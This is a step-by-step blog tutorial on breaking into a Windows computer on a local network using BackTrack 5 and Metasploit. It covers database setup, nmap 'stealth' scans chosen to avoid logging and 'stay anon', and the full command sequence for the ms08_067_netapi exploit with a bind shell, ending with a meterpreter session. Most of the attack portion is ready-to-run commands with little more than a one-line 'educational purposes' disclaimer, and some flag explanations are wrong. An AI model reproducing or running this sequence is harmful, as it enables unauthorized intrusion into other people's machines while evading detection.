This tutorial will walk you through hacking into a computer on your network using a program called metasploit. This program is built into BackTrack 5, so that is what I'll be using in this tutorial. You can find out where to get BackTrack 5 and how to set it up in the Hacking WiFi section of this app.
What you need:
Linux or BackTrack 5 (see Hacking WiFi section of this app for instructions)
Be on the same network as the PC target
First, we're going to create a username and password for our metasploit data base. To do this, open the command window and enter in:
service postgresql start
If you're using an older version of backtrack, the command will be /etc/init.d/postgresql-8.3 start or if that doesn't work, change the 8.3 to 8.4
Next, enter the following code: (if you're using backtrack, ignore the sudo commands)
sudo su postgres -c psql
ALTER USER postgres WITH PASSWORD 'your password';
q
sudo passwd -d postgres
sudo su postgres -c passwd
What this does is set up a user postgres with whatever password you choose. Now to create/connect to the postgresql database in metasploit you need to use the commands. Once inside metasploit enter:
db_connect postgres:yourpassword@127.0.0.1/msf3
This will create a postgresql database called msf3 if you haven't already. If you have it will just connect to it. This is where the show really gets going. Now you have two options... you can scan your network using outside tools to find the ip addresses or use an nmap ping scan. To use a ping scan with nmap you would use nmap from the db_nmap command because it automatically adds hosts in the network to your new postgresql database.
b_nmap -Pn -v 192.168.1.1-255
Now the -Pn argument tells nmap to run a ping scan on port 80 to decide what hosts are up and will add them to your database, while the -v command tells nmap to run in verbose mode giving you more detailed feedback while the scan is running. Now after you have a list of live hosts you can run nmap in a new mode.
db_nmap -sS -sV -sU -n -O -v 192.168.1.4
NOTE: VERY IMPORTANT. RUNNING THE -sS COMMAND VS THE -sT COMMAND.
THE -sT COMMAND COMPLETES A FULL TCP CONNECTION WHICH GETS LOGGED BY THE REMOTE HOST. TO PREVENT THIS RUNNING A STEALTH SYN SCAN WITH THE -sS COMMAND IS THE BEST OPTION. I HAVE STATED THIS IN OTHER TUTS ABOUT NMAP BUT TO STAY ANON YOU NEED TO DO THIS.
Now i run the ip 192.168.1.4 because that is what is currently on my network.
The -sS command runs a stealth syn scan which does not create a full tcp connection and allows you to continue unlogged. The -sV scan will tell you what services are running on a certain port which will come into play when selecting an exploit to use.
The -sU command runs a udp port scan against the target, and since there is no reply from udp packets they never get logged in the first place. The -O scan runs an OS scan against the target using tcp fingerprinting to tell you the operating system of the target machine, this will also come to play when selecting an exploit. The -n command tells nmap to not run a -Pn or ping scan agianst the target as they get logged, and since you have already done that once you wouldn't want to do it again.
And again the -v command runs nmap in verbose mode which allows you to see more of whats going on in the behind the scenes and helps you better understand what is happening.
Now once you have a list of open ports you can begin to choose your exploit based on port and operating system. For this exercise I chose the windows/smb/ms08_067_netapi exploit.
Now since port 445 is open I will attempt to run the ms08_067_netapi exploit against the target. So with metasploit open we will run
use windows/smb/ms08_067_netapi
set payload windows/bind_tcp
set rhost 192.168.1.4
set lhost 192.168.1.3
set lport 5150
check
NOTE:Run the show options command to display what information is required for the exploit to work properly.
Now these commands in metasploit will first set the exploit to use as the windows/smb/ms08_067_netapi exploit. The second sets metasploit to use a bind shell using tcp protocal.
The third sets the remote host to our target ip. The fourth sets the localhost to our ip, and the local port the one we want to listen on. Running the check command will tell us if the target is vulnerable or not.
And as you can see it is. So now we will run the exploit command
exploit
From there meterpreter will open... and congrats... you're in! View the next tutorial in this section for the different meterpreter commands you can use to manipulate the target.
This tutorial is for educational purposes only.
No comments:
Post a Comment